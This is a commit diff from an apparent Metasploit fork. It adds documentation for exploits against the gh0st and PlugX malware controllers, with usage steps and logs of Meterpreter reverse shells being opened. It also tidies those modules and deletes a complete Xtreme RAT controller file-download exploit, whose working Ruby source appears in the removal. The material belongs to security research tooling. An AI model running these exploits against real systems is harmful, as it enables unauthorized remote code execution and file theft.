Merge pull request #1 from h00die/updates

Modules cleanup and add docs
2017-09-05 13:48:09 -06:00 · 2017-09-05 13:48:09 -06:00 · 33e1777bab
parent 234a95af78 d05c401866
commit 33e1777bab
5 changed files with 86 additions and 127 deletions
--- a/documentation/modules/exploit/windows/misc/gh0st.md
+++ b/documentation/modules/exploit/windows/misc/gh0st.md
@ -0,0 +1,42 @@
 ## Vulnerable Application
  This module exploits a buffer overflow in the Gh0st Controller when handling a drive list as received by a victim.
  This vulnerability can allow remote code execution in the context of the user who ran it.
  A vulnerable version of the software is available here: [gh0st 3.6](https://github.com/rapid7/metasploit-framework/files/1243297/0efd83a87d2f5359fae051517fdf4eed8972883507fbd3b5145c3757f085d14c.zip)
 ## Verification Steps
  1. Run the application
  2. Start msfconsole
  3. Do: `use exploit/windows/misc/gh0st`
  4. Do: `set rhost [ip]`
  5. Do: `exploit`
  6. Get a shell
 ## Options
  **MAGIC**
  This is the 5 character magic used by the server.  The default is `Gh0st`
 ## Scenarios
 ### Windows XP SP3 with gh0st 3.6
 ```
 msf > use exploit/windows/misc/gh0st 
 msf exploit(gh0st) > set rhost 192.168.2.108
 rhost => 192.168.2.108
 msf exploit(gh0st) > exploit
 [*] Started reverse TCP handler on 1.2.3.4:4444 
 [*] 1.2.3.1:80 - Trying target Gh0st Beta 3.6
 [*] 1.2.3.1.108:80 - Spraying heap...
 [*] 1.2.3.1:80 - Trying command 103...
 [*] Sending stage (956991 bytes) to 1.2.3.1
 [*] Meterpreter session 1 opened (1.2.3.4:4444 -> 1.2.3.1:1303) at 2017-08-26 16:53:58 -0400
 [*] 1.2.3.1:80 - Server closed connection
 meterpreter >
 ```
--- a/documentation/modules/exploit/windows/misc/plugx.md
+++ b/documentation/modules/exploit/windows/misc/plugx.md
@ -0,0 +1,42 @@
 ## Vulnerable Application
  This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message.
  This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
  A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip)
 ## Verification
  1. Run the application
  2. Start msfconsole
  3. Do: `use exploit/windows/misc/plugx`
  4. Do: `set rhost [ip]`
  5. Do: `set target [target]`
  6. Do: `exploit`
  7. Click OK for the "PeDecodePacket" pop-up on the target
  8. Get a shell
 ## Scenarios
 ### Windows XP SP3 with PlugX type 1
 ```
 msf > use exploit/windows/misc/plugx 
 msf exploit(plugx) > set rhost 1.2.3.4
 rhost => 1.2.3.4
 msf exploit(plugx) > set target 1
 target => 1
 msf exploit(plugx) > set verbose true
 verbose => true
 msf exploit(plugx) > exploit
 [*] Started reverse TCP handler on 1.2.3.99:4444 
 [*] 1.2.3.4:13579 - Trying target PlugX Type I...
 [*] 1.2.3.4:13579 - waiting for response
 [*] Sending stage (956991 bytes) to 1.2.3.4
 [*] Meterpreter session 1 opened (1.2.3.99:4444 -> 1.2.3.4:1975) at 2017-09-04 19:53:07 -0400
 [*] 1.2.3.4:13579 - Server closed connection
 meterpreter > getuid
 Server username: WINXP\user
 ```
--- a/modules/exploits/windows/misc/gh0st.rb
+++ b/modules/exploits/windows/misc/gh0st.rb
@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
    register_options(
      [
-        OptString.new('MAGIC', [true, 'the 5 char magic used by the server', 'Gh0st']),
+        OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
        Opt::RPORT(80)
      ]
    )
@ -82,7 +82,6 @@ class MetasploitModule < Msf::Exploit::Remote
      print_status('Packet decompress failure')
      return false
    end
    # print_status(msg.ord.to_s)
    return true
  end
--- a/modules/exploits/windows/misc/plugx.rb
+++ b/modules/exploits/windows/misc/plugx.rb
@ -162,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote
    connect
    sock.put(pkt)
-    print_status('waiting for response')
+    print_status('Waiting for response')
    validate_response(sock.get_once)
    disconnect
--- a/modules/exploits/windows/misc/xtreme.rb
+++ b/modules/exploits/windows/misc/xtreme.rb
@ -1,124 +0,0 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'zlib'
 class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Xtreme Rat Controller Remote File Download Exploit',
      'Description'    => %q{
          This module exploits an arbitrary file download vulnerability in the Xtreme C&C server
      },
      'Author'         => 'Professor Plum',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
        ],
      'Platform'       => 'win',
      'DisclosureDate' => 'Jul 27 2017',
      'Targets'        =>
        [
          ['Xtreme RAT 3.6', { 'Ver' => '3.6' }],
          ['Xtreme RAT 3.7', { 'Ver' => '3.7' }]
        ],
      'Privileged'     => false,
      'DefaultTarget' => 1))
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETFILE', [true, 'Target file to download', 'user.info'])
      ]
    )
  end
  @delm = "\xc2\x00\xaa\x00\xc2\x00\xaa\x00\xc2\x00\xaa\x00#\x00#\x00#\x00\xe2\x00\" a\x01\xe2\x00\" a\x01\xe2\x00\" a\x01".force_encoding('utf-16le')
  @password = ''
  @conid = ''
  def validate(b)
    if b != "X\r\n"
      print_status(b.inspect)
      return false
    end
    true
  end
  def check
    connect
    sock.put("myversion|#{target['Ver']}\r\n")
    if validate(sock.recv(3))
      return Exploit::CheckCode::Appears
    end
    Exploit::CheckCode::Safe
  end
  def make_string(cmd, msg)
    pp = (cmd + @delm + msg)
    pack = Zlib::Deflate.deflate(pp)
    return @password + [pack.size, 0].pack('<II') + pack
  end
  def read_string(sock)
    d = sock.recv(16)
    if d.size < 16
      print_status("Didn't receive full packet!")
      return
    end
    @password = d[0..7]
    size = d[8..12].unpack('<I')[0]
    d = ''
    while d.size < size
      d += sock.get_once(size - d.size)
    end
    if d.size != size
      print_status("Bad response! #{d.size} != #{size}")
      return
    end
    msg = Zlib::Inflate.inflate(d).force_encoding('utf-16le')
    cmd, data = msg.split(@delm)
    # print_status("#{cmd.inspect} | #{data.inspect}")
    if 'maininfo'.encode('utf-16le') == cmd
      @conid = data
    end
    if 'updateserverlocal'.encode('utf-16le') == cmd
      fsize = data.encode('binary').to_i
      fdata = ''
      while fdata.size < fsize
        fdata += sock.get_once(fsize - fdata.size)
      end
      print_status("Received file #{datastore['TARGETFILE']}!")
      # print_status(fdata.inspect)
      path = store_loot('xtremeRat.file', 'text/plain', datastore['RHOST'], fdata, datastore['TARGETFILE'], 'File retrieved from Xtreme C2 server')
      print_good("File saved in: #{path}")
    end
  end
  def exploit
    print_status("Trying target #{target.name}...")
    connect
    sock.put("myversion|#{target['Ver']}\r\n")
    unless validate(sock.get_once(3))
      print_status('Server did not Ack hello')
      return
    end
    read_string(sock)
    print_status('Sending request')
    sock.put(make_string('newconnection|'.encode('utf-16le') + @conid + @delm + 'updateserverlocal'.encode('utf-16le'), datastore['TARGETFILE'].encode('utf-16le')))
    unless validate(sock.get_once(3))
      print_status('Server did not Ack message')
      return
    end
    read_string(sock)
    disconnect
  end
 end